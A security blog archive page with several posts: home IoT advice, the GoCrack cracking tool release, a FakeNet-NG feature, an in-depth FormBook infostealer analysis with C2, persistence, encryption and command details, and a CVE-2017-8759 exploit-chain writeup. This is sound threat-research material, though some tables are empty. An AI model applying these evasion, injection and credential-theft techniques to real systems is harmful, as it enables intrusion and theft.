Category Archives: Blog

Best Practices for Keeping Tabs on Your Apps

Let’s start this conversation out with the definition of device. The list of what constitutes one is growing. For now, let’s say that you have a home computer (desktop, laptop, or both), work computer (desktop, laptop, or both), home tablet, work tablet, personal smartphone, and work smartphone. This is a pretty extensive list of devices that an adversary could use to attack you professionally and personally. But what about your Amazon Alexa or gadgets, smart toys, and smart clocks? What about Google Assistant or Microsoft Cortana? Do you also have a SmartTV? What about NEST, Wink, WeMo, SensorPush, Neurio, ecobee4, Philips Hue, Smart Lock, GarageMate? Hoo boy! The list of connected devices goes on and on.

Are all of these devices safe to use? Well, the simple answer is no—unless you specifically paid attention to its security. Also, for your smart devices that work via voice control, do you know who might be listening on the other end? To make things worse, many of these devices are also used in the corporate world, because they are easy to deploy, and are very affordable.

What about applications? Did the developer that created the application you are using ensure they used good secure coding techniques? Or is there a likelihood they introduced a flaw in their code? Are the servers for the application you are running in the cloud secure? Is the data you are storing on these cloud systems protected from unauthorized access?

All really good questions we rarely ask ourselves—at least before we use the latest and coolest applications available. We all make risk-based decisions every day, but do we ever ensure we have all the data before we make that risk-based decision?

What Can You Do?

Start by doing whatever homework and research you can. Make sure you understand the social engineering methods that the malicious actors are currently using. Unsolicited phone calls from a government agency (like the IRS), a public utility, or even Microsoft or Apple are not legitimate. No you don’t owe back taxes, no your computer has not been hacked, no you don’t need to give out sensitive personal information to your power company over the phone.

How Can You Choose Safe Applications?

Simply Google “Is this <name of application> secure?” Never install an application that you don’t feel you can trust. Using an application is all about risk management. Make sure you understand the potential risk to device and data compromise, prior to choosing to use it.

How Can You Better Secure Your Home Network?

  1. Upon installation of any device, immediately change the login and password. These are often stored in the configuration files that come with the product, therefore are easy to look up.
  2. Change the login and password on your home Wi-Fi router frequently.
  3. Ensure the software for anything that connects is up to date.
  4. Make sure you have a clear sense of where your sensitive data is stored—and how it is protected. Is it adequately protected—or, better yet, encrypted?
  5. When in doubt, don’t connect an IoT device to the Internet.

Lastly, look at some solutions that can be added to your home Wi-Fi network, that provide additional layers of protection and detection against IoT and other advanced attacks. F-Secure Sense Gadget is one such solution, as is Luma smart Wi-Fi router, Dojo, and CUJO. Dojo, for example, monitors all incoming and outgoing traffic and performs analysis looking for malicious traffic. With known weaknesses in IoT and home networks in general, solutions like the above are a good investment.

Don’t Give Hackers Easy Access

Not long ago, a casino in the Northeast had a fish tank in their lobby. To make management of the fish tank easier, they installed an IoT-enabled thermostatic control to set and monitor water temperature in the tank. The thermostatic control was connected to their internal network, as well as IoT-enabled to allow easy access from anywhere on the Internet. The device was breached from the Internet by malicious actors, and the internal network was penetrated, allowing the hackers to steal information from a high-roller database before devices monitoring the network were able to identify the unauthorized data leaving the network and shut it down. A classic case of what can happen without the right due diligence.

Try and follow this motto. Just because you can, does not mean you should. The latest shiny IT gadget that will make you seem cool, or potentially make some portion of your life easier to manage, should be evaluated thoroughly for security weaknesses, before you turn it on and open it up to the world. Make that good risk-based decision. Not many of us would consider doing this: “Hey Alexa, open up my desktop computer so that all my sensitive data is opened for all the world to see.” Or would we?

The post Best Practices for Keeping Tabs on Your Apps appeared first on Connected.

Introducing GoCrack: A Managed Password Cracking Tool

FireEye's Innovation and Custom Engineering (ICE) team released a tool today called GoCrack that allows red teams to efficiently manage password cracking tasks across multiple GPU servers by providing an easy-to-use, web-based real-time UI (Figure 1 shows the dashboard) to create, view, and manage tasks. Simply deploy a GoCrack server along with a worker on every GPU/CPU capable machine and the system will automatically distribute tasks across those GPU/CPU machines.

Figure 1: Dashboard

As readers of this blog probably know, password cracking tools are an effective way for security professionals to test password effectiveness, develop improved methods to securely store passwords, and audit current password requirements. Some use cases for a password cracking tool can include cracking passwords on exfil archives, auditing password requirements in internal tools, and offensive/defensive operations. We’re releasing GoCrack to provide another tool for distributed teams to have in their arsenal for managing password cracking and recovery tasks.

Keeping in mind the sensitivity of passwords, GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task. Modifications to a task, viewing of cracked passwords, downloading a task file, and other sensitive actions are logged and available for auditing by administrators. Engine files (files used by the cracking engine) such as Dictionaries, Mangling Rules, etc. can be uploaded as “Shared”, which allows other users to use them in task yet do not grant them the ability to download or edit. This allows for sensitive dictionaries to be used without enabling their contents to be viewed.

Figure 2 shows a task list, Figure 3 shows the “Realtime Status” tab for a task, and Figure 4 shows the “Cracked Passwords” tab.

Figure 2: Task Listing

Figure 3: Task Status

Figure 4: Cracked Passwords Tab

GoCrack is shipping with support for hashcat v3.6+, requires no external database server (via a flat file), and includes support for both LDAP and database backed authentication. In the future, we plan on adding support for MySQL and Postgres database engines for larger deployments, ability to manage and edit files in the UI, automatic task expiration, and greater configuration of the hashcat engine. We’re shipping with Dockerfile’s to help jumpstart users with GoCrack. The server component can run on any Linux server with Docker installed. Users with NVIDIA GPUs can use NVIDIA Docker to run the worker in a container with full access to the GPUs.

GoCrack is available immediately for download along with its source code on the project's GitHub page. If you have any feature requests, questions, or bug reports, please file an issue in GitHub.

ICE is a small, highly trained, team of engineers that incubate and deliver capabilities that matter to our products, our clients and our customers. ICE is always looking for exceptional candidates interested in solving challenging problems quickly. If you’re interested, check out FireEye careers.

New FakeNet-NG Feature: Content-Based Protocol Detection

I (Matthew Haigh) recently contributed to FLARE’s FakeNet-NG network simulator by adding content-based protocol detection and configuration. This feature is useful for analyzing malware that uses a protocol over a non-standard port; for example, HTTP over port 81. The new feature also detects and adapts to SSL so that any protocol can be used with SSL and handled appropriately by FakeNet-NG. We were motivated to add this feature since it was a feature of the original FakeNet and it was needed for real world malware.

What is FakeNet-NG

FakeNet-NG simulates a network so malware analysts can run samples with network functionality without the risks of an Internet connection. Analysts can examine network-based indicators via FakeNet-NG’s textual and pcap output. It is plug-and-play, configurable, and works on both Windows and Linux. FakeNet-NG simulates common protocols to trick malware into thinking it is connected to the Internet. FakeNet-NG supports the following protocols: DNS, HTTP, FTP, POP, SMTP, IRC, SSL, and TFTP.

Previous Design

Previously FakeNet-NG employed Listener modules, which were bound to configurable ports for each protocol. Any traffic on those ports was received by the socket and processed by the Listener. 

In the previous architecture, packets were redirected using a Diverter module that utilized WinDivert for Windows and netfilter for Linux. Each incoming and outgoing packet was examined by the Diverter, which kept a running list of connections. Packets destined for outbound ports were redirected to a default Listener, which would respond to any packet with an echo of the same data. The Diverter also redirected packets based on whether FakeNet-NG was run in Single-Host or Multi-Host mode, and if any applications were blacklisted or whitelisted according to the configuration. It would simply release the packet on the appropriate port and the intended Listener would receive it on the socket.

New Design

My challenge was to eliminate this port/protocol dependency. In order to disassociate the Listeners from the corresponding ports, a new architecture was needed. The first challenge was to maintain Listener functionality. The original architecture relied on Python libraries that interact with the socket. Therefore, we needed to maintain “socket autonomy” in the Listener, so we added a “taste()” function for each Listener. The routine returns a confidence score based on the likelihood that the packet is associated with the protocol. Figure 1 demonstrates the taste() routine for HTTP, which looks for the request method string at the beginning of the packet data. It gives an additional point if the packet is on a common HTTP port. There were several choices for how these scores were to be tabulated. It could not happen in the Diverter because of the TCP handshake. The Diverter could not sample data from data-less handshake packets, and if the Diverter completed the handshake, the connection could not easily be passed to a different socket at the Listener without disrupting the connection.

Figure 1: HTTP taste() example


We ultimately decided to add a proxy Listener that maintains full-duplex connections with the client and the Listener, with both sides unaware of the other. This solves the handshake problem and maintains socket autonomy at the Listener. The proxy is also easily configurable and enables new functionality. We substituted the proxy for the echo-server default Listener, which would receive traffic destined for unbound ports. The proxy peeks at the data on the socket, polls the Listeners, and creates a new connection with the Listener that returns the highest score. The echo-server always returns a score of one, so it will be chosen if no better option is detected. The analyst controls which Listeners are bound to ports and which Listeners are polled by the proxy. This means that the listeners do not have to be exposed at all; everything can be decided by the proxy. The user can set the Hidden option in the configuration file to False to ensure the Listener will be bound to the port indicated in the configuration file. Setting Hidden to True will force any packets to go through the proxy before accessing the Listener. For example, if the analyst suspects that malware is using FTP on port 80, she can ‘hide’ HTTP from catching the traffic, and let the proxy detect FTP and forward the packet to the FTP Listener. Additional configuration options exist for choosing which protocols are polled by the proxy. See Figure 2 and Figure 3 for configuration examples. Figure 2 is a basic configuration for a Listener, and Figure 3 demonstrates how the proxy is configurable for TCP and UDP.

Figure 2: Listener Configuration Options

Figure3: Proxy Configuration Options

The proxy also handles SSL detection. Before polling the Listeners, the proxy examines the packet. If SSL is detected, the proxy “wraps” the socket in SSL using Python’s OpenSSL library. With the combination of protocol and SSL detection, each independent of the other, FakeNet-NG can now handle just about any protocol combination.

The proxied SSL implementation also allows for improved packet analysis. The connection between the proxy and the Listener is not encrypted, which allows FakeNet to dump un-encrypted packets to the pcap output. This makes it easier for the analyst to examine the packet data. FakeNet continues to produce pcap output that includes packet data before and after modification by FakeNet. While this results in repetitive data, it is often useful to see the original packet along with the modification.


Figure 4 shows verbose (-v) output from FakeNet on Windows responding to an HTTP request on port 81 from a clowncar malware variant (SHA-256 8d2dfd609bcbc94ff28116a80cf680660188ae162fc46821e65c10382a0b44dc). Malware such as clowncar use traditional protocols over non-standard ports for many reasons. FakeNet gives the malware analyst the flexibility to detect and respond to these cases automatically.

Figure 4: clowncar malware using HTTP on port 81


FLARE’s FakeNet-NG tool is a powerful network-simulation tool available for Windows and Linux. The new content-based protocol detection and SSL detection features ensure that FakeNet-NG remains the most useful tool for malware analysts. Configuration options give programmers the flexibility necessary to respond to malware using most protocols on any port.

Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea

We observed several high-volume FormBook malware distribution campaigns primarily taking aim at Aerospace, Defense Contractor, and Manufacturing sectors within the U.S. and South Korea during the past few months. The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware, including:

  • PDFs with download links
  • DOC and XLS files with malicious macros
  • Archive files (ZIP, RAR, ACE, and ISOs) containing EXE payloads

The PDF and DOC/XLS campaigns primarily impacted the United States and the Archive campaigns largely impacted the Unites States and South Korea.

FormBook Overview

FormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016. Figure 1 and Figure 2 show the online advertisement for the malware.

Figure 1: FormBook advertisement

Figure 2: FormBook underground pricing

The malware injects itself into various processes and installs function hooks to log keystrokes, steal clipboard contents, and extract data from HTTP sessions. The malware can also execute commands from a command and control (C2) server. The commands include instructing the malware to download and execute files, start processes, shutdown and reboot the system, and steal cookies and local passwords.

One of the malware's most interesting features is that it reads Windows’ ntdll.dll module from disk into memory, and calls its exported functions directly, rendering user-mode hooking and API monitoring mechanisms ineffective. The malware author calls this technique "Lagos Island method" (allegedly originating from a userland rootkit with this name). 

It also features a persistence method that randomly changes the path, filename, file extension, and the registry key used for persistence. 

The malware author does not sell the builder, but only sells the panel, and then generates the executable files as a service.


FormBook is a data stealer, but not a full-fledged banker (banking malware). It does not currently have any extensions or plug-ins. Its capabilities include: 

  • Key logging

  • Clipboard monitoring

  • Grabbing HTTP/HTTPS/SPDY/HTTP2 forms and network requests 
  • Grabbing passwords from browsers and email clients 
  • Screenshots 

FormBook can receive the following remote commands from the C2 server: 

  • Update bot on host system
  • Download and execute file
  • Remove bot from host system
  • Launch a command via ShellExecute
  • Clear browser cookies
  • Reboot system
  • Shutdown system
  • Collect passwords and create a screenshot
  • Download and unpack ZIP archive


The C2 domains typically leverage less widespread, newer generic top-level domains (gTLDs) such as .site, .website, .tech, .online, and .info.

The C2 domains used for this recently observed FormBook activity have been registered using the WhoisGuard privacy protection service. The server infrastructure is hosted on, a Ukrainian hosting provider. Each server typically has multiple FormBook panel installation locations, which could be indicative of an affiliate model.

Behavior Details

File Characteristics

Our analysis in this blog post is based on the following representative sample:


MD5 Hash

Size (bytes)

Compile Time




2012-06-09 13:19:49Z

Table 1: FormBook sample details


The malware is a self-extracting RAR file that starts an AutoIt loader. The AutoIt loader compiles and runs an AutoIt script. The script decrypts the FormBook payload file, loads it into memory, and then executes it.


The FormBook malware copies itself to a new location. The malware first chooses one of the following strings to use as a prefix for its installed filename:

ms, win, gdi, mfc, vga, igfx, user, help, config, update, regsvc, chkdsk, systray, audiodg, certmgr, autochk, taskhost, colorcpl, services, IconCache, ThumbCache, Cookies

It then generates two to five random characters and appends those to the chosen string above 

followed by one of the following file extensions:

  • .exe, .com, .scr, .pif, .cmd, .bat

If the malware is running with elevated privileges, it copies itself to one of the following directories:

  • %ProgramFiles% 
  • %CommonProgramFiles%

If running with normal privileges, it copies itself to one of the following directories:

  • %TEMP%


The malware uses the same aforementioned string list with a random string to create a prefix, appends one to five random characters, and uses this value as the registry value name.

The malware configures persistence to one of the following two locations depending on its privileges:

  • (HKCU|HKLM)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • (HKCU|HKLM)\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run


The malware creates two 16-byte mutexes. The first mutex is the client identifier (e.g., 8-3503835SZBFHHZ). The second mutex value is derived from the C2 information and the username (e.g., LL9PSC56RW7Bx3A5). 

The malware then iterates over a process listing and calculates a checksum value of process names (rather than checking the name itself) to figure out which process to inject. The malware may inject itself into browser processes and explorer.exe. Depending on the target process, the malware installs different function hooks (see the Function Hooks section for further detail).


The malware uses several techniques to complicate malware analysis: 

  • Timing checks using the RDTSC instruction
  • Calls NtQueryInformationProcess with InfoClass=7 (ProcessDebugPort)
  • Sample path and filename checks (sample filename must be shorter than 32 characters)
  • Hash-based module blacklist
  • Hash-based process blacklist
  • Hash-based username blacklist
  • Before communicating, it checks whether the C2 server is present in the hosts file

The results of these tests are then placed into a 16-byte array, and a SHA1 hash is calculated on the array, which will be later used as the decryption key for subsequent strings (e.g. DLL names to load). Failed checks may go unnoticed until the sample tries to load the supporting DLLs
(kernel32.dll and advapi32.dll).

The correct 16-byte array holding the result of the checks is: 

  • 00 00 01 01 00 00 01 00 01 00 01 00 00 00 00 00 

Having a SHA1 value of:

  • 5b85aaa14f74e7e8adb93b040b0914a10b8b19b2 

After completing all anti-analysis checks, the sample manually maps ntdll.dll from disk into memory and uses its exported functions directly in the code. All API functions will have a small stub function in the code that looks up the address of the API in the mapped ntdll.dll using the CRC32 checksum of the API name, and sets up the parameters on the stack. 

This will be followed by a direct register call to the mapped ntdll.dll module. This makes regular debugger breakpoints on APIs inoperable, as execution will never go through the system mapped ntdll.dll.

Process Injection

The sample loops through all the running processes to find explorer.exe by the CRC32 checksum of its process name. It then injects into explorer.exe using the following API calls (avoiding more commonly identifiable techniques such as WriteProcessMemory and CreateRemoteThread):

  • NtMapViewOfSection
  • NtSetContextThread
  • NtQueueUserAPC

The injected code in the hijacked instance of explorer.exe randomly selects and launches (as a suspended process) a built-in Windows executable from the following list: 

  • svchost.exe, msiexec.exe, wuauclt.exe, lsass.exe, wlanext.exe, msg.exe, lsm.exe, dwm.exe, help.exe, chkdsk.exe, cmmon32.exe, nbtstat.exe, spoolsv.exe, rdpclip.exe, control.exe, taskhost.exe, rundll32.exe, systray.exe, audiodg.exe, wininit.exe, services.exe, autochk.exe, autoconv.exe, autofmt.exe, cmstp.exe, colorcpl.exe, cscript.exe, explorer.exe, WWAHost.exe, ipconfig.exe, msdt.exe, mstsc.exe, NAPSTAT.EXE, netsh.exe, NETSTAT.EXE, raserver.exe, wscript.exe, wuapp.exe, cmd.exe 

The original process reads the randomly selected executable from the memory of explorer.exe and migrates into this new process via NtMapViewOfSection, NtSetContextThread, and NtQueueUserAPC. 

The new process then deletes the original sample and sets up persistence (see the Persistence section for more detail). It then goes into a loop that constantly enumerates running processes and looks for targets based on the CRC32 checksum of the process name. 

Targeted process names include, but are not limited to: 

  • iexplore.exe, firefox.exe, chrome.exe, MicrosoftEdgeCP.exe, explorer.exe, opera.exe, safari.exe, torch.exe, maxthon.exe, seamonkey.exe, avant.exe, deepnet.exe, k-meleon.exe, citrio.exe, coolnovo.exe, coowon.exe, cyberfox.exe, dooble.exe, vivaldi.exe, iridium.exe, epic.exe, midori.exe, mustang.exe, orbitum.exe,
palemoon.exe, qupzilla.exe, sleipnir.exe, superbird.exe, outlook.exe, thunderbird.exe, totalcmd.exe

After injecting into any of the target processes, it sets up user-mode API hooks based on the process. 

The malware installs different function hooks depending on the process. The primary purpose of these function hooks is to log keystrokes, steal clipboard data, and extract authentication information from browser HTTP sessions. The malware stores data in local password log files. The directory name is derived from the C2 information and the username (the same as the second mutex created above: LL9PSC56RW7Bx3A5). 

However, only eight bytes from this value are used as the directory name (e.g., LL9PSC56). Next, the first three characters from the derived directory name are used as a prefix for the log file followed by the string log. Following this prefix are names corresponding to the type of log file. For example, for Internet Explorer passwords, the following log file would be created:

  • %APPDATA%\LL9PSC56\LL9logri.ini.

The following are the password log filenames without the prefix:

  • (no name): Keylog data
  • rg.ini: Chrome passwords
  • rf.ini: Firefox passwords
  • rt.ini: Thunderbird passwords
  • ri.ini: Internet Explorer passwords
  • rc.ini: Outlook passwords
  • rv.ini: Windows Vault passwords
  • ro.ini: Opera passwords

One additional file that does not use the .INI file extension is a screenshot file:

  • im.jpeg

Function Hooks

Keylog/clipboard monitoring:

  • GetMessageA
  • GetMessageW
  • PeekMessageA
  • PeekMessageW
  • SendMessageA
  • SendMessageW

Browser hooks:

  • PR_Write
  • HttpSendRequestA
  • HttpSendRequestW
  • InternetQueryOptionW
  • EncryptMessage
  • WSASend

The browser hooks look for certain strings in the content of HTTP requests and, if a match is found, information about the request is extracted. The targeted strings are:

  • pass
  • token
  • email
  • login
  • signin
  • account
  • persistent

Network Communications

The malware communicates with the following C2 server using HTTP requests: 

  • www[.]clicks-track[.]info/list/hx28/


As seen in Figure 3, FormBook sends a beacon request (controlled by a timer/counter) using HTTP GET with an "id" parameter in the URL.

Figure 3: FormBook beacon

The decoded "id" parameter is as follows:

  • FBNG:134C0ABB 2.9:Windows 7 Professional x86:VXNlcg==


  • "FBNG" - magic bytes

  • "134C0ABB" - the CRC32 checksum of the user's SID 
  • "2.9" - the bot version

  • "Windows 7 Professional" – operating system version
  • "x86" – operating system architecture

  • "VXNlcg==" - the Base64 encoded username (i.e., "User" in this case)

Communication Encryption

The malware sends HTTP requests using hard-coded HTTP header values. The HTTP headers shown in Figure 4 are hardcoded.

Figure 4: Hard-coded HTTP header values

Messages to the C2 server are sent RC4 encrypted and Base64 encoded. The malware uses a slightly altered Base64 alphabet, and also uses the character "." instead of "=" as the pad character:

  • Standard Alphabet: 
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • Modified Alphabet: 
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_

The RC4 key is created using an implementation of the SHA1 hashing algorithm with the C2 URL. The standard SHA1 algorithm reverses the DWORD endianness at the end of the algorithm. This implementation does not, which results in a reverse endian DWORDs. For example, the SHA1 hash for the aforementioned URL is "9b198a3cfa6ff461cc40b754c90740a81559b9ae," but when reordering the DWORDs, it produces the correct RC4 key: 3c8a199b61f46ffa54b740cca84007c9aeb95915. The first DWORD "9b198a3c" becomes "3c8a199b."

Figure 5 shows an example HTTP POST request.

Figure 5: Example HTTP POST request

In this example, the decoded result is: 

  • Clipboard\r\n\r\nBlank Page - Windows Internet Explorer\r\n\r\ncEXN{3wutV,

Accepted Commands

When a command is sent by the C2 server, the HTTP response body has the format shown in Figure 6.

Figure 6: FormBook C2 server response with command

The data begins with the magic bytes "FBNG," and a one-byte command code from hex bytes 31 to 39 (i.e., from "1" to "9") in clear text. This is then followed by the RC4-encoded command data (where the RC4 key is the same as the one used for the request). In the decrypted data, another occurrence of the magic FBNG bytes indicates the end of the command data. 

The malware accepts the commands shown in Table 2.


Parameters (after decryption)


'1' (0x31) 


Download and execute file from %TEMP% directory 

'2' (0x32) 


Update bot on host machine 

'3' (0x33) 


Remove bot from host machine 

'4' (0x34) 


Launch a command via ShellExecute 

'5' (0x35) 


Clear browser cookies 

'6' (0x36) 


Reboot operating system 

'7' (0x37) 


Shutdown operating system 

'8' (0x38) 


Collect email/browser passwords and create a screenshot

'9' (0x39) 


Download and unpack ZIP archive into %TEMP% directory

Table 2: FormBook accepted commands

Distribution Campaigns

FireEye researchers observed FormBook distributed via email campaigns using a variety of different attachments:

  • PDFs with links to the "" URL-shortening service, which then redirected to a staging server that contained FormBook executable payloads
  • DOC and XLS attachments that contained malicious macros that, when enabled, initiated the download of FormBook payloads
  • ZIP, RAR, ACE, and ISO attachments that contained FormBook executable files

The PDF Campaigns

The PDF campaigns leveraged FedEx and DHL shipping/package delivery themes (Figure 7 and Figure 8), as well as a document-sharing theme. The PDFs distributed did not contain malicious code, just a link to download the FormBook payload.

The staging servers (shown in Table 3) appeared to be compromised websites.

Figure 7: Example PDF campaign email lure with attachment

Figure 8: Example PDF campaign attachment

Sample Subject Lines

Shorted URLs

Staging Servers

<Recipient’s_Name> - You have a parcel awaiting pick up

<Recipient’s_Name> – I shared a file with you

















Table 3: Observed email subjects and download URLs for PDF campaign

Based on data from the links, there were a total of 716 hits across 36 countries. As seen in Figure 9, most of the malicious activity from the PDF campaign impacted the United States.

Figure 9: Geolocation statistics from URL shortener

The DOC/XLS Campaigns

The email campaigns distributing DOC and XLS files relied on the use of malicious macros to download the executable payload. When the macros are enabled, the download URL retrieves an executable file with a PDF extension. Table 4 shows observed email subjects and download URLs used in these campaigns.

Sample Subject Lines

Staging Server

URL Paths


ACS PO 1528















Table 4: Observed email subjects and download URLs for the DOC/XLS campaign

FireEye detection technologies observed this malicious activity between Aug. 11 and Aug. 22, 2017 (Figure 10). Much of the activity was observed in the United States (Figure 11), and the most targeted industry vertical was Aerospace/Defense Contractors (Figure 12).

Figure 10: DOC/XLS campaign malicious activity by date

Figure 11: Top 10 countries affected by the DOC/XLS campaign

Figure 12: Top 10 industry verticals affected by the DOC/XLS campaign

The Archive Campaign

The Archive campaign delivered a variety of archive formats, including ZIP, RAR, ACE, and ISO, and accounted for the highest distribution volume. It leveraged a myriad of subject lines that were characteristically business related and often regarding payment or purchase orders:

Sample Subject Lines


MT103 PAYMENT CONFIRMATION Our Ref: BCCMKE806868TSC Counterparty:.

Fwd: INQUIRY RFQ-18 H0018

Fw: Remittance Confirmation


PO. NO.: 10701 - Send Quotaion Pls

Re: bgcqatar project

Re: August korea ORDER

Purchase Order #234579

purchase order for August017

FireEye detection technologies observed this campaign activity between July 18 and Aug. 17, 2017 (Figure 13). Much of the activity was observed in South Korea and the United States (Figure 14), with the Manufacturing industry vertical being the most impacted (Figure 15).

Figure 13: Archive campaign malicious activity by date

Figure 14: Top 10 countries affected by the Archive campaign

Figure 15: Top 10 industry verticals affected by the Archive campaign 


While FormBook is not unique in either its functionality or distribution mechanisms, its relative ease of use, affordable pricing structure, and open availability make FormBook an attractive option for cyber criminals of varying skill levels. In the last few weeks, FormBook was seen downloading other malware families such as NanoCore.  The credentials and other data harvested by successful FormBook infections could be used for additional cyber crime activities including, but not limited to: identity theft, continued phishing operations, bank fraud and extortion.

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY,FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. Mandiant analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ( - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.

Figure 2: SOAP definition VS Generated code

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage.  Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named “word.db” from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named “left.jpg,” which in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

Why Is North Korea So Interested in Bitcoin?,Why Is North Korea So Interested in Bitcoin?

In 2016 we began observing actors we believe to be North Korean utilizing their intrusion capabilities to conduct cyber crime, targeting banks and the global financial system. This marked a departure from previously observed activity of North Korean actors employing cyber espionage for traditional nation state activities. Yet, given North Korea's position as a pariah nation cut off from much of the global economy – as well as a nation that employs a government bureau to conduct illicit economic activity – this is not all that surprising. With North Korea's tight control of its military and intelligence capabilities, it is likely that this activity was carried out to fund the state or personal coffers of Pyongyang's elite, as international sanctions have constricted the Hermit Kingdom.

Now, we may be witnessing a second wave of this campaign: state-sponsored actors seeking to steal bitcoin and other virtual currencies as a means of evading sanctions and obtaining hard currencies to fund the regime. Since May 2017, Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds. The spearphishing we have observed in these cases often targets personal email accounts of employees at digital currency exchanges, frequently using tax-themed lures and deploying malware (PEACHPIT and similar variants) linked to North Korean actors suspected to be responsible for intrusions into global banks in 2016.

Add to that the ties between North Korean operators and a watering hole compromise of a bitcoin news site in 2016, as well as at least one instance of usage of a surreptitious cryptocurrency miner, and we begin to see a picture of North Korean interest in cryptocurrencies, an asset class in which bitcoin alone has increased over 400% since the beginning of this year.

2017 North Korean Activity Against South Korean Cryptocurrency Targets

  • April 22 – Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement).
  • April 26 – The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
  • Early May – Spearphishing against South Korean Exchange #1 begins.
  • Late May – South Korean Exchange #2 compromised via spearphish.
  • Early June – More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
  • Early July – South Korean Exchange #3 targeted via spear phishing to personal account.

Benefits to Targeting Cryptocurrencies

While bitcoin and cryptocurrency exchanges may seem like odd targets for nation state actors interested in funding state coffers, some of the other illicit endeavors North Korea pursues further demonstrate interest in conducting financial crime on the regime’s behalf. North Korea's Office 39 is involved in activities such as gold smuggling, counterfeiting foreign currency, and even operating restaurants. Besides a focus on the global banking system and cryptocurrency exchanges, a recent report by a South Korean institute noted involvement by North Korean actors in targeting ATMs with malware, likely actors at the very least supporting similar ends.

